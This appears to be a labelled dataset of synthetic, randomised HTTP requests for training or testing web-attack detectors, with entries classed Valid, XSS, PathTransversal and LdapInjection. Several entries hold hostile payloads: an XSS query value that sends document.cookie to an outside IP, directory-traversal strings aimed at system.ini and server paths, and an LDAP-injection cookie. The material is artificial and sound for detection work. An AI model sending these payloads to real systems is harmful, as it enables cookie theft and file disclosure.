If-Modified-Since: Sat, 15 May 04 24:46:18 GMT
If-Unmodified-Since: Sun, 23 Aug 09 11:43:56 CET
If-Match: "Cn78QQXcAagO.Df"
If-None-Match: "bkyjff2CWaAGk.uYfWxC"
If-Range: *
Max-Forwards: 98
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: NTLM eWw3ZmJ2YXNkZmNyTnVoNmw0YWFoc3JzeE9Mb2lkM3NjMXZ3RTRlbXhZaXJuSWE=
Authorization: NTLM RXJlZWdiOXBzc2lhdG1tZmw4eHJpYWVocWVhY2N0bHdhc3BjaGhsYWxkdG4=
Range: 257723-74,-66
Referer: /9gitri/ttmss6in/mwWc.exe
TE: trailers,trailers,gzip;q=0.8
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.9 (Machintosh; U; PPC Mac OS X 4.6; sO-ai; rv:5.6.5) Gecko/44643286
UA-Disp: 794,0889,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5121x090
Via: 1.3 www.hedhrr.png
Transfer-Encoding: compress
Upgrade: aite/2.5
Warning: 063 211.26.149.166 "smbe8tiNrn" "Sat, 11 Mar 06 17:33:18 CET"
X-Forwarded-For: 231.143.90.28
X-Serial-Number: 30089699
----: -----------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 37358
Start - Id: 6105
class: Valid
PUT /ojnt/e-S8rkQTnwnQYFzGN/aLvtbIeeKWLMVYGJH_Rd/ncWev8mordehnianer3.pl? HTTP/1.1
Content-Length: 91
Content-Language: elnosm
Content-Encoding: identity
Content-Location: /p8akberU/isycos5x/jmlreuE.png
Content-MD5: eXNwdWFEc2xyNzZlZmFlcg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 18 May 07 24:04:20 UTC
Last-Modified: Tue, 11 Jul 06 20:22:56 GMT
Host: 176.208.56.59
Connection: keep-alive
Accept: audio/*, text/*;q=0.9
Accept-Charset: *
Accept-Encoding: identity, identity, gzip, identity
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 86.254.200.116
Cookie: I.likeG3SeXr=0;eoaeAi=tdflvzk.Mx;Tnaew4lsts=7 Adlrifoh
Cookie2: $Version="6"
Date: Thu, 12 May 05 07:57:21 UTC
ETag: W/"NX9gb-ZQtwu8YX5h4"
Expect: mEhD=y8nam
From: g0cci8@oemaeN.uk
If-Modified-Since: Mon, 16 Aug 04 03:25:53 UTC
If-Unmodified-Since: Wed, 28 May 08 02:36:51 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM aWVlbGh0aXJtZml0ZWJwbHJsYW9vZmV0c1ZPb3JuZHRjdHlhaWJvZUVnbkk1Zw==
Range: 32908-897936,302-48186
Referer: http://www.prhstno.biz/regeel/ygetmIlb/Iuliecge/eHe4b/aonigaee.jsp
TE: chunked;q=0.4,gzip;q=0.4
Trailer: Host
User-Agent: Mozilla/8.9 (compatible; 9a1uNiaEil; Open BSD i386; t5sOIhe; hHje; rehrv)
UA-CPU: PowerPC
UA-Disp: 395,743,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 4456x1785
Via: 0.4 144.5.30.45
Transfer-Encoding: R6ewea; lvrbt4n=Eeeno7nh
Upgrade: mndT8/4.5
Warning: 650 69.47.85.230 "eneld6Odeonlenmnn" "Tue, 12 Aug 08 13:16:53 CET"
X-Forwarded-For: 224.40.113.11
X-Serial-Number: 89346832324261469384
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

gvrt7eev1ea=qoteec+1&RilrnrehZ=eNR&ie=73964&wi6erw7oocweEh=22148&aT8aononojjuc2=3HTXLnNn2

End - Id: 6105
Start - Id: 47390
class: XSS
GET /1RP/Sdytii2w3Eocn/w0n7n@ErxyuBHkzAezv/4WEqh/Yofvdlne9Ie/trt5b.shtml?WXw6W9a=%3Cimg+++src+++%3D+%22+++livescript%3A%5Bwindow.open%28%27http%3A%2F%2F237.95.17.8%2Fveisna.mspx%27%2Bdocument.cookie%29%3B%5D++++%22+%3E HTTP/1.0
Host: www.esnpbs.st
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: x-mac-hebrew;q=0.1, windows-1253;q=0.8, iso-8859-1, cp-936;q=0.4, x-mac-greek
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 193.205.45.58
Cookie: S5zVAJchildOSp=fiatm ;toosowg=dHootqil;ie=9091
Cookie2: $Version="92"
Date: Mon, 30 Jun 08 19:28:36 UTC
ETag: "X6NLtsE7gq4Uvvt"
Expect: 100-continue
From: ra6tapm@ejbc5awp.com
If-Modified-Since: Tue, 11 Jan 05 05:25:11 CET
If-Unmodified-Since: Sat, 01 Oct 05 06:31:01 UTC
If-Match: "4Y8nSEt-_TiAm7GBoO6"
If-None-Match: *
If-Range: *
Max-Forwards: 28
MIME-Version: 1.0
Pragma: u='a'
Proxy-Authorization: cHest eInm=wotttdoe
Authorization: NTLM ZWFldnJyZXNBbU5naW1JbnRlY3B0dnJyZXN6b2VjbnJlc2Vz
Range: 35419-,75138-2674,165640-
Referer: http://maarod.net/oae0mn/nsls1pr/itjjdhn/Le2jh.msf
TE: chunked;q=0.4,chunked;q=0.7,trailers
Trailer: Expect
User-Agent: Mozilla/5.7 (Machintosh; U; Mac OS X 3.4; pt-oa; rv:6.9.4) Gecko/04250117
UA-CPU: MIPS
UA-Disp: 7745,5252,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1670x058
Via: 3.5 www.fnkhvIa.png
Transfer-Encoding: iwizw
Upgrade: uns/4.6, rb2/9.4, tsywas/1.7, Onrj/5.3, anii/8.9
Warning: 270 120.123.100.132 "hvi74Edbooyr" "Mon, 07 Jan 08 14:05:19 UTC"
X-Forwarded-For: 131.225.250.219
X-Serial-Number: 6529673477463
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47390
Start - Id: 5874
class: Valid
PUT /eGaswwLZ3/1connectItreplaceCf90dKm/8IZW/yjGJkCAH/eMZN.jpg? HTTP/1.0
Content-Length: 188
Content-Language: eAcpo,1e,ptBeyiyx
Content-Encoding: gzip
Content-Location: /iltrn4n/eqftb/envS7/vinu8t.nsf
Content-MD5: QWVUd29yZWVWZXVpZWc1dA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 13 Apr 06 19:20:51 CET
Last-Modified: Sat, 18 Jun 05 13:09:33 GMT
Host: www.zgdib.uk
Connection: mhja
Accept: application/rtf
Accept-Charset: x-mac-greek;q=0.0, iso-8859-1;q=0.0, x-mac-arabic;q=0.9, iso-2022-kr
Accept-Encoding: gzip;q=0.5, gzip;q=0.5
Accept-Language: fcg-Uonn, R1usmdi-Tnm
Cache-Control: f6=RsoL
Client-ip: 99.15.144.135
Cookie: n6sAgel=030706;eattaoA=152
Cookie2: $Version="0"
Date: Tue, 13 Nov 07 07:10:19 UTC
ETag: W/"PIT7baSOcooW8aoQ-U"
Expect: ssis=tnmz
From: mOr4g@othliluhnF.org
If-Modified-Since: Wed, 03 Mar 10 07:46:35 CET
If-Unmodified-Since: Sat, 26 Nov 05 18:13:42 GMT
If-Match: "nFE-.ildJU5y8I.GfUr"
If-None-Match: "CrJVBqZ.mS7pv.m3H"
If-Range: Mon, 10 Mar 08 10:27:43 CET
Max-Forwards: 4
MIME-Version: 0.9
Pragma: c=M84
Proxy-Authorization: Digest username="cubArear"
Authorization: htr2 fpTaH=4sluniac
Range: 8-
Referer: http://www.i2n1.com/Teemrw05.jpeg
TE: gzip
Trailer: Host
User-Agent: Mozilla/7.1 (compatible; MSIE 6.9; Win 9x; tnRd; rPnRo; iaetmese6)
UA-CPU: x86
UA-Disp: 5175,9978,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 621x973
Via: 6ml7/0.7 www.o46frte.html, FTP/5.2 254.44.184.138, FTP/8.6 152.20.142.2:6
Transfer-Encoding: gzip
Upgrade: bnotd/1.8
Warning: 170 www.oseryN.jpg "sydinifctYn" "Mon, 28 Aug 06 23:59:58 UTC"
X-Forwarded-For: 10.142.82.192
X-Serial-Number: 9871025244196928372
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

mv4ea1o=18145&NVdocumentCselectA=79&opYd=eWl dnph-?oeA cNboot.ini &suit9Ae=9brnoexechit7aslrxdaO&rceetaeh0runsW=trvxOiiSb&othpfbmeo06r=aQ1Wf2Q&Oevdp=e6teOtedNiainmmw&me6r=vm@-S1N&oio=2

End - Id: 5874
Start - Id: 25941
class: Valid
GET /e0qJXTL@bSkwPdhtHIA1/eprz/rnp309arkVB/ehRltbtstnr/o1XseNpHN6JFPHo29A/ttmiiebhohaThLemn/uocm.mspx?zaeOaoDha=nbodyAnodeo%27%3Beffg&positione9Vtc=sascript%3Cotcltgs4a&yilnytmnc=axV.zQUcdK1%40&sejmybaoFm=ttcEln5t&6AvdCPwp-=n%29nEozDqWethh6&rilguiv=500&ELhIF5XDFSIx=1297&stNoeotirr=%3Cr4tllhos HTTP/1.0
Host: www.enxerb.org
Connection: close
Accept: */*
Accept-Charset: windows-1254;q=0.3, koi8-r;q=0.1, x-mac-roman;q=0.2, x-mac-cyrillic, iso-8859-2
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-age=56454
Client-ip: 5.150.27.149
Cookie: ha=40707523;adoygaomOirsst=coeo=ltpxRa ;Fstyles-xp_=lht a~ga1;gesicn9ght=3ar
Cookie2: $Version="133"
Date: Mon, 25 Jun 07 08:52:10 CET
ETag: "eiDN7Tz@qZy.F3MgZQ"
Expect: 0nsepEe=Ea7Q3
From: naaufvp@rOayez.uk
If-Modified-Since: Sat, 03 Apr 10 21:28:50 CET
If-Unmodified-Since: Wed, 23 Jan 08 16:48:11 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 24 Feb 10 08:40:32 UTC
Max-Forwards: 571
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: NTLM bmVoc3llZXdpRXJ0OWtibXdpNXlyZGRpcml3cGxtcnBzZ2FpcW1qNHRF
Authorization: Basic ZW1hbmlxOmluaWlydg==
Range: -1909,0060-494,6-
Referer: http://ernTht3.be/m7iir.asp
TE: trailers,chunked;q=0.8,trailers
Trailer: Host
User-Agent: aRsLTsNa http://www.r5qo9.de
UA-CPU: StrongARM
UA-Disp: 973,4090,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 5187x1770
Via: FTP/4.0 186.219.25.97, 2.8 www.uaisdo.html:520
Transfer-Encoding: identity
Upgrade: ci5/2.9, wetema/8.5, v8el3/8.4, izrs/8.5
Warning: 746 121.108.111.96 "trungcrrorn" "Sun, 27 Mar 05 22:10:39 GMT"
X-Forwarded-For: 106.231.90.123
X-Serial-Number: 1807971586692
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 25941
Start - Id: 5471
class: Valid
POST /gig6/qpcin/9j0Neltot/o4TawetirS6do/esdblapciie9/e3gbATZLUKbEKl9j/otgaidt/rM8wqseCoo/0szosoureiho1Qnsd/Zq1C0jN.Im.nsf? HTTP/1.1
Content-Length: 296
Content-Language: rvro,gdd,3ernhi
Content-Encoding: gzip
Content-Location: /jcet6/astnl/oerbh/rtavE6s.cgi
Content-MD5: ZWxyZmZzZWFldmNzaEppaw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 07 Nov 06 19:32:00 CET
Last-Modified: Thu, 22 Jul 04 17:45:38 GMT
Host: www.bnntes.net
Connection: keep-alive
Accept: text/*;q=0.3, image/*;q=0.1, audio/x-wav;q=0.4
Accept-Charset: euc-jp, iso-8859-2;q=0.4, hz-gb-2312
Accept-Encoding: *
Accept-Language: nrA-cL, i-lhat84e;q=0.7, 0ati5oe-3hkx, io-ilyeaTED, admnrNcB-ahDrspi
Cache-Control: eu='9te'
Client-ip: 150.73.146.141
Cookie: LperlfIe@O@9ifM=t8lnrt;ara9=6818689670;nodeahYMH1WLu=l9lhKegMW;dEepaieess9aez=w$w(logaOnt;cladNE8a=gr@2
Cookie2: $Version="32"
Date: Tue, 27 Nov 07 15:57:40 UTC
ETag: "Z8VNi7KCbZMJ9ytR_"
Expect: 100-continue
From: lczro@ehIntmhe.com
If-Modified-Since: Wed, 04 Apr 07 06:21:30 UTC
If-Unmodified-Since: Wed, 09 Jun 04 12:07:59 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 05 Jun 08 16:12:01 UTC
Max-Forwards: 2
MIME-Version: 2.8
Pragma: aigela='0oael'
Proxy-Authorization: ksiih lttrsD=rNe6
Authorization: ekfi 0oeo=knwolUur
Range: 25867-
Referer: /cilflc2f/tNec8i/saiot/nsrap/dmNTHmUt.asp
TE: chunked,trailers,chunked
Trailer: Max-Forwards
User-Agent: oVvlaaaresnlabZa
UA-CPU: PowerPC
UA-Disp: 4898,121,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 898x7009
Via: FTP/9.8 244.70.23.7, 8.6 www.t4yrno.js, FTP/9.7 89.105.43.46
Transfer-Encoding: gzip
Upgrade: iashj/1.2, vlrlkr/1.0, tesek/2.7, haauNe/7.3
Warning: 232 205.34.58.158 "A5atihehavykOapat646" 
X-Forwarded-For: 16.29.207.187
X-Serial-Number: 56905023798190
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

AYwusrdx.i1=78&F1yjcTxp_UXC=d<rft8icsd bntksw5&bhhso=eteyeoettts0&UdyWqW=8Y94aelriK&ddCcaWv8a=40271&1nevys1cxUdbct=w'&jFvformqBe=n&olne2at0sUnmnr6=1240&searTnltohdsu=05984372&.phpSKmetaStjb6nQ=omeaMei jdeletel3&iae5auE=807224&lhmjnmEoeermeaz=ouzG72DP87z&nremsdha5d=eexecte&99@rxN3O8S=16430486

End - Id: 5471
Start - Id: 28905
class: Valid
GET /ZTliEKerzsdnF8tsoen2/oacsr9yoxee/cb5oNQYB2VE4LXgS8/eEpgIwbbFcCbZD@ftrU/1ktJZn2/rnsilewrikmiaGK/0Pl17ZuNSsEcYJeQ/wg@YvFS/iecuiis6eau/OalnousltHsdsh5K7iei.mspx?essee=x&hgtt=S+nawp-cibhseta%3AconnectO&wp-q73xfmHGS=slmyoolocationt2&ha1ng=bnohls%7E%25econp%25u&sa7ubeS=rserisamne&te54ee5=2mils&msacfm=ehwz&Lhkaded5oerliD=0821399 HTTP/1.1
Host: 162.1.198.148
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-2022-jp;q=0.9, iso-8859-3;q=0.2, windows-1253;q=0.3, windows-1254, iso-8859-8-i
Accept-Encoding: 
Accept-Language: fneoto-o, sh-ncspdsou, hsrk-d
Cache-Control: max-age=515
Client-ip: 35.251.112.175
Cookie: tAst=2tmifnnfemfY;sarrRearf=ntt;ventgois=Lrsdsiazoatgumae;srNgd=636178;BlBWIsFbdcmE=8Aipn
Cookie2: $Version="11"
Date: Sat, 27 Mar 10 04:58:49 CET
ETag: W/"6kJzAzy5z_apNO5"
Expect: 100-continue
From: trrfyie@htyofoaez.ch
If-Modified-Since: Sun, 07 Dec 08 03:43:49 UTC
If-Unmodified-Since: Wed, 14 Jul 04 11:12:53 CET
If-Match: *
If-None-Match: "sVlfOlPp6h@loBIV"
If-Range: Tue, 20 Apr 10 13:23:08 CET
Max-Forwards: 627
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Digest uri=/qjEaKd.asp
Authorization: fxp6e artNtfcu=iayi
Range: 492-,-067,215329-8229
Referer: http://ydni.st/8eroce/2qOuxk/andemet.doc
TE: gzip;q=0.0
Trailer: If-Unmodified-Since
User-Agent: at6iarA
UA-CPU: StrongARM
UA-Disp: 6808,9425,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 218x9813
Via: HTTP/0.2 www.elee.css:51
Transfer-Encoding: compress
Upgrade: gtFdng/9.2, tlogad/2.0, 0nanTR/9.4, nu1d/8.3
Warning: 724 www.ei3iee94.css:2 "n9feptaf" "Sat, 15 Apr 06 01:19:38 CET"
X-Forwarded-For: 160.62.173.241
X-Serial-Number: 2568531119908025423
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28905
Start - Id: 45285
class: PathTransversal
GET /tC@Y/L@/iwg_v7Ao/3Iv2AhIaPbn/ntaF/CHejSicnlscvT3/lOi.html? HTTP/1.0
Host: 187.41.20.113
Connection: keep-alive
Accept: video/*;q=0.5, image/*, image/*;q=0.0
Accept-Charset: big5;q=0.1, euc-jp, euc-kr, windows-1257;q=0.3
Accept-Encoding: 
Accept-Language: rm-MorjIe, t-bp;q=0.3, iolnsie1-rervt;q=0.6, ist-raeqdt
Cache-Control: no-store
Client-ip: 253.245.176.25
Cookie: ihptmg9nEsek=Atce;ssnlt=|;lrrP9uhRpt=81;I0dg=-oo;jEktfoseelsal=eto
Cookie2: $Version="4"
Date: Mon, 19 Mar 07 06:01:05 UTC
ETag: W/"5sS.bHdpvUqWsjVo-1h"
Expect: ruRriaR=bioddtes;bsfxiao=2oktcsxn
From: eHayb@eTitoou.com
If-Modified-Since: Sat, 11 Jul 09 14:43:23 UTC
If-Unmodified-Since: Mon, 07 Nov 05 15:13:27 UTC
If-Match: "XEjffJGz31bk2n7Fs"
If-None-Match: "yw6.OSZM7TYq7My"
If-Range: *
Max-Forwards: 70
Pragma: no-cache
Proxy-Authorization: Basic b1F1enNlOmR4cnFlYg==
Authorization: Basic NjBycjJyOmhub2I=
Range: -3,07-8,-6
Referer: /lqsiej/a1th/iyojontd.php4
TE: trailers,gzip;q=0.8,chunked;q=0.7
Trailer: TE
User-Agent: ..\..\..\..\..\..\..\..\..\WINDOWS\system.ini
UA-OS: Win9x
UA-Pixels: 8576x7305
Via: jr5/7.7 67.152.192.239, 7.6 www.6ttB.htm, FTP/8.3 235.1.202.39:64
Transfer-Encoding: gzip
Upgrade: sY7kva/6.7, wn5/7.5
Warning: 022 246.223.178.94:2891 "umhssfmiFhwrIlra" "Sat, 10 Sep 05 05:37:31 GMT"
X-Forwarded-For: 238.149.119.17
X-Serial-Number: 1947313
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45285
Start - Id: 27044
class: Valid
GET /nBIOZw16HT4L2rq/iHcWBFCvzgQIRXrK/e-d@c/ouesi/Hfstylel9-xQ0t/kRbSf0l/n5kFO.9--BN7usE9o/bqzew5IfBfsl9monh/pHWprXedRls/nu-sINsgyXN5/fJFr.js? HTTP/1.1
Host: www.ikyaLq5e.com:6
Connection: close
Accept: video/quicktime;q=0.8
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-stale=8
Client-ip: 206.160.126.16
Cookie: g6nGvhei=8tnoali delete7srml[idzsg;f9=tu4JtdfgQXPj;cfw=dhibidf6mbpf
Cookie2: $Version="9"
Date: Thu, 21 Oct 04 05:58:46 UTC
ETag: W/"Q2o9leRJa@r_IgZQ"
Expect: 3d78
From: caaati2g@ijas.biz
If-Modified-Since: Sun, 03 Oct 04 13:14:18 UTC
If-Unmodified-Since: Wed, 29 Jul 09 01:43:55 CET
If-Match: *
If-None-Match: "CvK-hC0TvtbcA@C-d"
If-Range: *
Max-Forwards: 3923
MIME-Version: 2.2
Pragma: eej='tdh6'
Proxy-Authorization: NTLM dXNkZWZsb250ZXN0SXNqaG1hbm5nd2lzY29jZXNlc25YYWlmdDB0aWh0cmgwc2hu
Authorization: Basic YzFldDpuZTNVbGtyaQ==
Range: 34-,11052-0053,7-3
Referer: http://www.veiRet.biz/e0rf/taitf.avi
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: uungxau/2.7
UA-CPU: PowerPC
UA-Disp: 2539,8756,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6860x985
Via: 8.4 www.Mm0aamr.htm, 9.1 www.keug.html:24662
Transfer-Encoding: on7cIc; ryznha=tse6
Upgrade: oleg/7.0, eesLi/0.3, s6tY/7.4, Ehnhw1/4.6
Warning: 487 190.19.226.50 "taog3tlnve" "Mon, 04 Jul 05 09:35:24 CET"
X-Forwarded-For: 41.72.7.124
X-Serial-Number: 894392
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27044
Start - Id: 34931
class: Valid
POST /1okst.aspx? HTTP/1.0
Content-Length: 86
Content-Language: narsezeb,gg
Content-Encoding: compress
Content-Location: /ilytsa/Erhasson/tigmA/aa1sDdba/tcsIt.conf
Content-MD5: b250bzF3dG9yU2xySG16dQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 05 Jan 08 22:29:17 CET
Last-Modified: Mon, 17 Aug 09 18:50:05 UTC
Host: www.6i7gbh1.ch
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: windows-1253
Accept-Encoding: gzip;q=0.2, compress;q=0.2, deflate, gzip;q=0.5, deflate;q=0.9
Accept-Language: *;q=0.7
Cache-Control: min-fresh=4357
Client-ip: 253.250.214.170
Cookie: gneilucnrT=ftpI;ryxeh=19869;tkl=ec5;g6e=s5rSf21
Cookie2: $Version="916"
Date: Mon, 31 May 04 11:27:46 GMT
ETag: "mJsO-rnuj-rVHtAqj"
Expect: ncCs9wt=rTxL;cide=txRe3
From: sdqf@ierMt4h.ch
If-Modified-Since: Mon, 09 Aug 04 08:58:55 CET
If-Unmodified-Since: Wed, 15 Nov 06 02:54:54 GMT
If-Match: "j3B8f@ODGiNYGQqgE"
If-None-Match: "LgR3ipO3FO_5IyP7"
If-Range: Thu, 20 Oct 05 05:08:35 CET
Max-Forwards: 530
MIME-Version: 6.7
Pragma: e='IOnbige'
Proxy-Authorization: Digest qop=auth
Authorization: Digest nc=42Cdeea2
Range: 26302-,-510,4934-
Referer: http://ellni.de/dhd2uNeh.tiff
TE: gzip;q=0.2,deflate,trailers
Trailer: If-None-Match
User-Agent: Mozilla/1.6 (Windows; U; Win 9x 2.2; ts-bn; rv:3.9.0) Gecko/06504541
UA-CPU: x86
UA-Disp: 7242,197,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2377x8201
Via: 8.0 242.252.113.47, 8.1 www.4beod.html
Transfer-Encoding: nyodi
Upgrade: yeadoo/9.1, ynen/6.6, egnCa/7.9, uis/6.9
Warning: 265 68.227.212.166:78 "moawtiltates" 
X-Forwarded-For: 69.156.101.181
X-Serial-Number: 61683738419
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

NYprocessing-instruction8JegT9=r80V&dilQ7tSecs=3313761&OmElgg=7&cl8rnw=logP&dsda=c)v

End - Id: 34931
Start - Id: 22935
class: Valid
GET /t@nxbxAP23r1UJ4t.js?raeptia=5878892468 HTTP/1.1
Host: www.mhne.fr
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-japanese;q=0.9, iso-8859-5, x-mac-icelandic;q=0.4
Accept-Encoding: deflate, compress;q=0.4, deflate;q=0.3
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 53.69.199.207
Cookie: CnEtestexroehp=2992;izG-libHai=~ne)-;notnmjTht=/7@?la=/bniowhereD Nt;JNC3=350
Cookie2: $Version="8"
Date: Sat, 03 May 08 17:08:39 CET
ETag: W/"7wTF12Qg9gzKIlgkm9"
Expect: c9U4=dtl8rty
From: 9ennRe0@diEo.fr
If-Modified-Since: Mon, 22 Jun 09 24:46:38 CET
If-Unmodified-Since: Wed, 18 Feb 09 10:32:39 GMT
If-Match: "fYV@Js933u9Ccdn6dMFV"
If-None-Match: "a1ACJ-Fezj9aemYKV"
If-Range: Sun, 26 Jul 09 14:08:41 GMT
Max-Forwards: 89
MIME-Version: 1.1
Pragma: i=metzs
Proxy-Authorization: ieSnx2 uercttms=caa5oarX
Authorization: sh5fa tirnAf=mhRn3M
Range: 3828-,508-92
Referer: /nrshg.cfm
TE: trailers,chunked
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.0 (Windows; U; WinNT 1.1; lI-ek; rv:6.1.6) Gecko/30195280
UA-CPU: 68000
UA-Disp: 3881,209,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 159x1338
Via: FTP/2.2 87.248.109.112, 9.5 www.awPasr40.htm, 0.4 www.awvtahy.htm:25504
Transfer-Encoding: identity
Upgrade: bey/2.9, ttdnH/6.2, Mue9/1.0, jecyw/5.5, 1dic/2.5
Warning: 116 www.qob7.png "kgn8bPjeeFe" 
X-Forwarded-For: 18.154.169.169
X-Serial-Number: 08954851223
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22935
Start - Id: 37412
class: LdapInjection
GET /dee/6vP0Nig6gPJrm@.sock_stream/e1ahleNNte/SPLt2n/sfohhx/hX/o3B84@PGO/n9neusiut/3Sh3emRol/3eIdneaksmbehceaiHye/tkrrtfEepAdrc.html?oAeor=952&ueiiiglhid12c=lhzclNdwindow.open%26n3%3F&1i5js8fiet=94&ssorSeli8eAd=64822778&gt=64362&oilba=aAn3G13wpx&sciorTAtg=i1fk.z%40gEu&KdIkObrI=A&ebde79=raunioncrcpt&sR=i%3C%5Byeioe%3Alsa%2Fs%7C&tbhueorgo=b+lec7m0sgs%40sw6&Nyi5eE=+&lrFiN=847&YFxtermYYq4j=nLehtpass1%28eisjincludeE7yr HTTP/1.1
Host: 58.47.99.174
Connection: el5Ezedl
Accept: video/quicktime;q=0.3, image/gif;q=0.1, application/x-tar
Accept-Charset: x-mac-chinesesimp, euc-tw;q=0.8, iso-8859-5;q=0.4, windows-1257;q=0.8
Accept-Encoding: *;q=0.7
Accept-Language: o8sel-sT, dnn-arys6;q=0.3, crirhwnn-itt, r3-Oogawno, err-iuhapsdd
Cache-Control: iioh='if'
Client-ip: 251.36.167.50
Cookie: RcHk=ey)(    |   (wer=*);odienge39m=9;bEietmsh=hdivy;2kFzprocessing-instructionL=biefth1r8Jln2a8h;seetDabe0elt=315731
Cookie2: $Version="7"
Date: Tue, 05 Jul 05 14:38:49 CET
ETag: W/"fYGy0yiXzgbqmdeFk"
Expect: 100-continue
From: Nhpimenh@ddh2omeHLt.ch
If-Modified-Since: Tue, 10 Apr 07 08:55:03 CET
If-Unmodified-Since: Tue, 19 Oct 04 15:51:03 UTC
If-Match: *
If-None-Match: "JzE85.vjQTdQdj@5A93"
If-Range: Wed, 26 Mar 08 02:07:45 CET
Max-Forwards: 479
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Basic dXJlZmllOmllTGFlZWlk
Authorization: Digest response="CF3cfec9c4A22FAbEF26d0C34ADe4EFb"
Range: 43109-087928,-7,22480-
Referer: /irrh/p4uakrF.ace
TE: chunked;q=0.4,deflate;q=0.1
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.5 (X11; U; Unix 0.1; dh-cs; rv:6.9.7) Gecko/28509913
UA-CPU: Sparc
UA-Disp: 143,2118,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 005x049
Via: HTTP/9.8 www.mcude8r.html
Transfer-Encoding: danave; ri3sbxrz=soehCTae
Upgrade: 5sbtw/8.8, 7se/7.4, wuo/9.3, ineLdd/9.9
Warning: 856 www.lyor.js:3401 "doia0real" "Thu, 07 Jan 10 05:39:49 CET"
X-Forwarded-For: 111.212.219.245
X-Serial-Number: 3259207891662820
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37412
Start - Id: 45673
class: PathTransversal
GET /9b9Alb1QsettE/lqsAEstat/lsakdtabl/iiwrOJM/F3Yvdeletep-uusr8/vttrhaeijgtittniuyy/68liNo/t9t/tu/nn9zEsD--hsJEO7F8z/Isra7tpinymotds2cm.jpeg?OdnestDrogn=72&2qnuhiOhhe2seul=b3xP&goxmteotcs=vrounmn&setosoXt=mxe%40&dlk5ntoUpOetnT=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fet%2Fasas%2Fseraisasto%2Fnaic.php3&tbewesco6Itl4tl=56204159&sesphnmhlwdbe=414610&Laa76er0mE=58&-7MgH=7889876&2tascoiameq3tT=er&E1ena8Uu=eYdPeeosann%24%7Etmtf%5Ce HTTP/1.1
Host: www.rhrIerhihu.biz
Connection: eyTezee
Accept: */*;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 10.24.0.201
Cookie: iairNtt=nehtqT;eelicieao2zr=iyyD90ch;rposrdk6pemlen=>;Bai0f3e5no=sn;e;lsoeia2idqi0Ee=2a6B
Cookie2: $Version="5"
Date: Thu, 19 Apr 07 21:14:02 CET
ETag: W/"GIZ.qU7cnYNpxU@"
Expect: 100-continue
From: nerbc@c9tot8nhs.cz
If-Modified-Since: Wed, 14 Apr 10 07:35:11 GMT
If-Unmodified-Since: Mon, 19 Apr 10 09:44:19 CET
If-Match: "hHkbkBmiYuc-XI.Frg"
If-None-Match: "cUIgVCA7eKWAFvfKX"
If-Range: Thu, 10 Jul 08 20:53:53 GMT
Max-Forwards: 43
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="vhio"
Authorization: ow9V eoqAdp7m=elEsrjii
Range: -368400,7896-37283
Referer: http://www.hin7n2eu.biz/eytvis/gzti.doc
